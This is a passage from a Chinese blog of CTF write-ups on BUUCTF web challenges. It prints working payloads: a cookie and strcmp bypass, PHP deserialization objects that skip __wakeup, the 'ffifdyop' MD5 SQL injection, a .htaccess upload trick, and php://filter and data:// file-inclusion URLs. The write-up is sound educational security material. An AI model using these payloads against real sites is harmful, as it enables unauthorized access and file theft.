<p>唔，原来是我眼瞎，没看到注释里面的GitHub</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/tishi.png" class="">

<p>python flask的解法不会，看了看Unicode欺骗，</p>
<p>大致的思路是：在注册的时候”ADMIN”经过strlower()，转成”ADMIN”，在修改密码的时候”ADMIN”经过strlower()变成”admin”，当我们再次退出登录的时候”admin”经strlower()变成”admin”(没啥卵用，但是你已经知道了一个密码已的”admin”，而且在index.html中可以看到只要</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">session<span class="token punctuation">[</span><span class="token string single-quoted-string">'name'</span><span class="token punctuation">]</span><span class="token operator">==</span><span class="token string single-quoted-string">'admin'</span>  也就是只要用户是<span class="token string single-quoted-string">'admin'</span>就可成功登录了<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>这解法还真是出人意料</p>
<h2 id="极客大挑战-2019-Buy-Flag"><a href="#极客大挑战-2019-Buy-Flag" class="headerlink" title="极客大挑战 2019 Buy Flag"></a>极客大挑战 2019 Buy Flag</h2><p>简要点进去，发现有个 pay.php 的接口，感觉要做什么身份认证吧或许？扫一下目录看看。</p>
<p>没扫出来，看到 pay.php 的 cookie 字段很特别，有一个 user&#x3D;0 的键值对，把它修改成 cuit 试了试，还是没用，然后在 response 请求中突然看到了源码。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/BuyFlagCode.png" class="">

<p>这里是若判断，所以构造一下 payload 吧，只需要 password 字段即可。</p>
<p>修改 password 为 404，user 为 cuit 发包，没得到 flag，有点奇怪。加上 money 字段试一试</p>
<p>还是没用，尝试将 user 改为 1，因为 0 代表 false，1 代表 true。</p>
<p>也就是这样</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/WrongBuyFlag.png" class="">

<p>但是回显错了，可能是 100000000 这个数据太长了，猜测被 <code>strcmp</code> 了，用科学计数法简单绕过：10e10</p>
<p>发包成功，得到 flag</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/SuccessBuyFlag.png" class="">
<h2 id="极客大挑战-2019-PHP"><a href="#极客大挑战-2019-PHP" class="headerlink" title="极客大挑战 2019 PHP"></a>极客大挑战 2019 PHP</h2><ul>
<li>应该是有泄露源码，尝试 &#x2F;<a class="link"   target="_blank" rel="noopener" href="http://www.zip/" >www.zip<i class="fas fa-external-link-alt"></i></a></li>
</ul>
<p>这里吧，序列化反序列化，参数传 <code>select</code></p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Geek_2019_PHP.png" class="">

<p>再看 class.php 的文件</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Geek_2019_PHP_Data.png" class="">

<p>这应该就是要我们构造序列化的东西，传进去，但是要跳过 <code>__wakeup()</code> 方法</p>
<p>这里构造序列化的话是这个 </p>
<pre class="line-numbers language-none"><code class="language-none">O:4:&quot;Name&quot;:2:&#123;s:14:&quot;Nameusername&quot;;s:5:&quot;admin&quot;;s:14:&quot;Namepassword&quot;;i:100;&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>在反序列化字符串时，属性个数的值大于实际属性个数时，会跳过 <code>__wakeup()</code> 函数的执行</p>
<p>因此我们将序列化这样设置</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token constant">O</span><span class="token punctuation">:</span><span class="token number">4</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"Name"</span><span class="token punctuation">:</span><span class="token number">3</span><span class="token punctuation">:</span><span class="token punctuation">&#123;</span>s<span class="token punctuation">:</span><span class="token number">14</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"Nameusername"</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">5</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"admin"</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">14</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"Namepassword"</span><span class="token punctuation">;</span>i<span class="token punctuation">:</span><span class="token number">100</span><span class="token punctuation">;</span><span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>不过还是没有结束，因为这个声明变量是private</p>
<p>private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，类名和字段名前面都会加上0的前缀。字符串长度也包括所加前缀的长度</p>
<p>我们再次改造一下序列化</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token constant">O</span><span class="token punctuation">:</span><span class="token number">4</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"Name"</span><span class="token punctuation">:</span><span class="token number">3</span><span class="token punctuation">:</span><span class="token punctuation">&#123;</span>s<span class="token punctuation">:</span><span class="token number">14</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"%00Name%00username"</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">5</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"admin"</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">14</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"%00Name%00password"</span><span class="token punctuation">;</span>i<span class="token punctuation">:</span><span class="token number">100</span><span class="token punctuation">;</span><span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>就可以了</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/Geek_2019_PHPFlag.png" class="">
<h2 id="BJDCTF2020-Easy-MD5"><a href="#BJDCTF2020-Easy-MD5" class="headerlink" title="BJDCTF2020 Easy MD5"></a>BJDCTF2020 Easy MD5</h2><p>不是很懂攻击点，单纯 password 不太能攻击吧，传参是 password，先扫一波看看。</p>
<p>应该是没啥东西，看源码，发现了东西。</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/BJDCTFEasyMD5Find.png" class="">

<p>这里挺难的，如果不知道的话，基本做不出来，</p>
<p>上网找 payload 可以很轻松地找到 ffifdyop，这个点的原理是 ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9ed621c，这个字符串前几位刚好是 ‘ or ‘6，而 Mysql 刚好又会吧 hex 转成 ascii 解释，因此拼接之后的形式是</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span> <span class="token string">'admin'</span> <span class="token keyword">where</span> password<span class="token operator">=</span><span class="token string">''</span> <span class="token operator">or</span> <span class="token string">'6xxxxx'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/BJDCTFEasyMD5Controller.png" class="">

<p>o 这里我想多了，直接会到这个接口</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/BJDCTFEasyMD5.png" class="">

<p>a，b md5 相同，但是值不能相同，如果队里有密码手估计不用多久吧。</p>
<p>QNKCDZO</p>
<p>s155964671a</p>
<p>过了</p>
<p>接着第三个，用数组绕</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/BJDCTFEasyMD5Success.png" class="">

<h2 id="MRCTF2020-你传你🐎呢"><a href="#MRCTF2020-你传你🐎呢" class="headerlink" title="MRCTF2020 你传你🐎呢"></a>MRCTF2020 你传你🐎呢</h2><ul>
<li>典型的文件上传题目</li>
</ul>
<p>传 php 不行，传 jpeg 无法解析，加文件头不行，尝试 <code>.htacess</code></p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/MRCTFUploadHtacess.png" class="">

<p>传 htacess 后传入一句话木马即可，我这里失败了，可能是容器的问题吧</p>
<h2 id="ZJCTF-2019-NiZhuanSiWei"><a href="#ZJCTF-2019-NiZhuanSiWei" class="headerlink" title="ZJCTF 2019 NiZhuanSiWei"></a>ZJCTF 2019 NiZhuanSiWei</h2><p>源码如下</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>    
<span class="token variable">$text</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"text"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>  
<span class="token variable">$file</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"file"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>  
<span class="token variable">$password</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string double-quoted-string">"password"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>  
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$text</span><span class="token punctuation">)</span><span class="token operator">&amp;&amp;</span><span class="token punctuation">(</span><span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$text</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'r'</span><span class="token punctuation">)</span><span class="token operator">===</span><span class="token string double-quoted-string">"welcome to the zjctf"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>  
    <span class="token keyword">echo</span> <span class="token string double-quoted-string">"&lt;br>&lt;h1>"</span><span class="token operator">.</span><span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$text</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'r'</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string double-quoted-string">"&lt;/h1>&lt;/br>"</span><span class="token punctuation">;</span>  
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"/flag/"</span><span class="token punctuation">,</span><span class="token variable">$file</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>  
        <span class="token keyword">echo</span> <span class="token string double-quoted-string">"Not now!"</span><span class="token punctuation">;</span>  
        <span class="token keyword">exit</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>   
    <span class="token punctuation">&#125;</span><span class="token keyword">else</span><span class="token punctuation">&#123;</span>  
        <span class="token keyword">include</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  <span class="token comment">//useless.php        $password = unserialize($password);  </span>
        <span class="token keyword">echo</span> <span class="token variable">$password</span><span class="token punctuation">;</span>  
    <span class="token punctuation">&#125;</span>  
<span class="token punctuation">&#125;</span>  
<span class="token keyword">else</span><span class="token punctuation">&#123;</span>    <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  
<span class="token punctuation">&#125;</span>  
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>绕过 <code>text</code> 这里的限制，因为要读取文件中的字符串，所以我们可以用这种方式绕过</p>
<pre class="line-numbers language-payload" data-language="payload"><code class="language-payload">?text&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,welcome to the zjctf<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>后续需要通过 <code>?file</code> 进行文件包含，再通过 <code>password</code> 进行反序列化，所以这一步我们应该是要去通过 <code>?file</code> 参数读源码，payload 如下</p>
<pre class="line-numbers language-payload" data-language="payload"><code class="language-payload">file&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;useless.php<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>如果直接读是读不到任何信息的，因为直接读只能读出一行</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/nizhuansiweiFile.png" class="">

<p>转码之后得到源代码</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>  

<span class="token keyword">class</span> <span class="token class-name-definition class-name">Flag</span><span class="token punctuation">&#123;</span>  <span class="token comment">//flag.php  </span>
    <span class="token keyword">public</span> <span class="token variable">$file</span><span class="token punctuation">;</span>  
    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__tostring</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>  
        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>  
            <span class="token keyword">echo</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">file</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
            <span class="token keyword">echo</span> <span class="token string double-quoted-string">"&lt;br>"</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> <span class="token punctuation">(</span><span class="token string double-quoted-string">"U R SO CLOSE !///COME ON PLZ"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>  
    <span class="token punctuation">&#125;</span>  
<span class="token punctuation">&#125;</span>  
<span class="token delimiter important">?></span></span>  <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>到这里就很简单了，编写 payload</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Flag</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  
<span class="token variable">$a</span><span class="token operator">-></span><span class="token property">file</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"flag.php"</span><span class="token punctuation">;</span>  
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">;</span>  
<span class="token keyword">echo</span> <span class="token function">urlencode</span><span class="token punctuation">(</span><span class="token variable">$b</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>按照道理来说打的 payload 应该是这样的</p>
<pre class="line-numbers language-payload" data-language="payload"><code class="language-payload">&#x2F;?text&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,welcome%20to%20the%20zjctf&amp;file&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;useless.php&amp;password&#x3D;O%3A4%3A%22Flag%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>但是这个 payload 实际情况打不通，实际打的过程中需要将 <code>file=useless.php</code>，可能是因为 <code>file</code> 的内容将后续部分给覆盖了</p>
<img src="/2022/07/20/Buu%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/nizhuansiweiFlag.png" class="">

<h2 id="watevrCTF-2019-Pickle-Store"><a href="#watevrCTF-2019-Pickle-Store" class="headerlink" title="watevrCTF-2019 Pickle Store"></a>watevrCTF-2019 Pickle Store</h2><ul>
<li>做一个 Pickle 反序列化的题目，之前强网杯就碰到了，如果当时自己能够有这方面的知识储备，或许也能做出来，所以现在恶补一下。</li>
</ul>

            </div>

            
                <div class="post-copyright-info">
                    
<div class="article-copyright-info-container">
    <ul class="copyright-info-content">
        <li class="post-title">
            <span class="type">本文标题</span>：<span class="content">Buu之Web部分刷题记录</span>
        </li>
        <li class="post-author">
            <span class="type">本文作者</span>：<span class="content">Drunkbaby</span>
        </li>
        <li class="post-time">
            <span class="type">创建时间</span>：<span class="content">2022-07-20 17:40:34</span>
        </li>
        <li class="post-link">
            <span class="type">本文链接</span>：<span class="content">2022/07/20/Buu之Web部分刷题记录/</span>
        </li>
        <li class="post-license">
            <span class="type">版权声明</span>：<span class="content">本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！</span>
        </li>
    </ul>
    <div class="copy-copyright-info flex-center tooltip" data-content="复制版权信息" data-offset-y="-2px">
        <i class="fa-solid fa-copy"></i>
    </div>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/CTF%E5%88%B7%E9%A2%98/">#CTF刷题</a>&nbsp;
                        </li>
                    
                </ul>
            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                               rel="prev"
                               href="/2022/07/20/HackTheBox%E4%B9%8BWeb%E9%83%A8%E5%88%86%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/"
                            >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                                <span class="title flex-center">
                                <span class="post-nav-title-item">HackTheBox之Web部分刷题记录</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                               rel="next"
                               href="/2022/07/20/SQL%E6%B3%A8%E5%85%A5Getshell%E5%AD%A6%E4%B9%A0/"
                            >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">SQL注入Getshell学习</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                                <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                            </a>
                        </div>
                    
                </div>
            

            
                <div class="comment-container">
                    
<div class="comments-container">
    <div id="comments-anchor"></div>
    <div class="comment-area-title">
        <i class="fas fa-comments"></i>&nbsp;评论
    </div>
    
        
            

    <div class="valine-container">
        <script data-pjax src="//cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"></script>
        <div id="vcomments"></div>
        <script data-pjax>
          function loadValine() {

            const config = {
              el: '#vcomments',
              appId: 'mCIu9X4iLP3I0GikUoetB9bV-9Nh9j0Va',
              appKey: 'ermlV1eoB1YODT088EdXjo6C',
              meta: ['nick', 'mail', 'link'],
              avatar: 'wavatar',
              enableQQ: true,
              placeholder: 'just go go',
              lang: 'zh-CN'.toLowerCase()
            }

            if ('') {
              config.serverURLs = ''
            }

            new Valine(config)

            function getAuthor(language) {
              switch (language) {
                case 'en':
                  return 'Author'
                case 'zh-CN':
                  return '博主'
                default:
                  return 'Master'
              }
            }

            // Add "Author" identify
            const getValineDomTimer = setInterval(() => {
              const vcards = document.querySelectorAll('#vcomments .vcards .vcard')
              if (vcards.length > 0) {
                let author = 'Drunkbaby'

                if (author) {
                  for (let vcard of vcards) {
                    const vnick_dom = vcard.querySelector('.vhead .vnick')
                    const vnick = vnick_dom.innerHTML
                    if (vnick === author) {
                      vnick_dom.innerHTML = `${vnick} <span class="author">${getAuthor(KEEP.hexo_config.language)}</span>`
                    }
                  }
                }
                clearInterval(getValineDomTimer)
              } else {
                clearInterval(getValineDomTimer)
              }
            }, 2000)
          }

          if ('true' === 'true') {
            const loadValineTimeout = setTimeout(() => {
              loadValine()
              clearTimeout(loadValineTimeout)
            }, 1000)
          } else {
            window.addEventListener('DOMContentLoaded', loadValine)
          }
        </script>
    </div>



        
    
</div>

                </div>
            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#ACTF2020-%E6%96%B0%E7%94%9F%E8%B5%9BUpload"><span class="nav-text">ACTF2020-新生赛Upload</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BA%90%E7%A0%81%E8%A7%A3%E6%9E%90"><span class="nav-text">源码解析</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%BC%BA%E7%BD%91%E6%9D%AF2019-Upload"><span class="nav-text">强网杯2019-Upload</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E9%A2%98%E7%9B%AE"><span class="nav-text">0x01 题目</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-%E6%89%BE%E6%BA%90%E4%BB%A3%E7%A0%81"><span class="nav-text">0x02 找源代码</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RoarCTF2019-EasyCalc"><span class="nav-text">RoarCTF2019-EasyCalc</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E9%A2%98%E7%9B%AE-1"><span class="nav-text">0x01 题目</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="nav-text">0x02 代码审计</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-%E7%BB%95%E8%BF%87%E6%89%8B%E6%AE%B5"><span class="nav-text">0x03 绕过手段</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-%E6%9E%84%E9%80%A0-EXP"><span class="nav-text">0x04 构造 EXP</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RoarCTF2019-Easy-Java"><span class="nav-text">RoarCTF2019-Easy Java</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-BabySQL"><span class="nav-text">极客大挑战 2019 BabySQL</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-EasySQL"><span class="nav-text">极客大挑战 2019 EasySQL</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019Http"><span class="nav-text">极客大挑战-2019Http</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%8F%E7%BB%93"><span class="nav-text">小结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019Knife"><span class="nav-text">极客大挑战-2019Knife</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-LoveSQL"><span class="nav-text">极客大挑战 2019 LoveSQL</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019Secret-File"><span class="nav-text">极客大挑战-2019Secret-File</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019Upload"><span class="nav-text">极客大挑战-2019Upload</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%9D%B6%E5%9C%BA%E9%83%A8%E5%88%86"><span class="nav-text">靶场部分</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BA%90%E7%A0%81%E9%83%A8%E5%88%86"><span class="nav-text">源码部分</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GXYCTF2019BabySQli"><span class="nav-text">GXYCTF2019BabySQli</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GXYCTF2019-PingPingPing"><span class="nav-text">GXYCTF2019-PingPingPing</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%96%B9%E5%BC%8F%E6%94%BB%E5%87%BB"><span class="nav-text">命令执行方式攻击</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HCTF-2018-admin"><span class="nav-text">HCTF 2018 admin</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Buy-Flag"><span class="nav-text">极客大挑战 2019 Buy Flag</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-PHP"><span class="nav-text">极客大挑战 2019 PHP</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#BJDCTF2020-Easy-MD5"><span class="nav-text">BJDCTF2020 Easy MD5</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MRCTF2020-%E4%BD%A0%E4%BC%A0%E4%BD%A0%F0%9F%90%8E%E5%91%A2"><span class="nav-text">MRCTF2020 你传你🐎呢</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ZJCTF-2019-NiZhuanSiWei"><span class="nav-text">ZJCTF 2019 NiZhuanSiWei</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#watevrCTF-2019-Pickle-Store"><span class="nav-text">watevrCTF-2019 Pickle Store</span></a></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            
<footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
                <span>2021</span> -
            
            2023
            
                &nbsp;<i class="fas fa-heart icon-animate"></i>
                &nbsp;<a href="/">Drunkbaby</a>
            
        </div>
        
            <script async data-pjax
                    src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    访问人数&nbsp;<span id="busuanzi_value_site_uv"></span>&ensp;
                
                
                    总访问量&nbsp;<span id="busuanzi_value_site_pv"></span>
                
            </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.6.1</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="tools-item flex-center go-to-comments">
                <i class="fas fa-comment"></i>
                <span class="post-comments-count"></span>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/dark-light-toggle.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.6.1/source/js/local-search.js"></script>



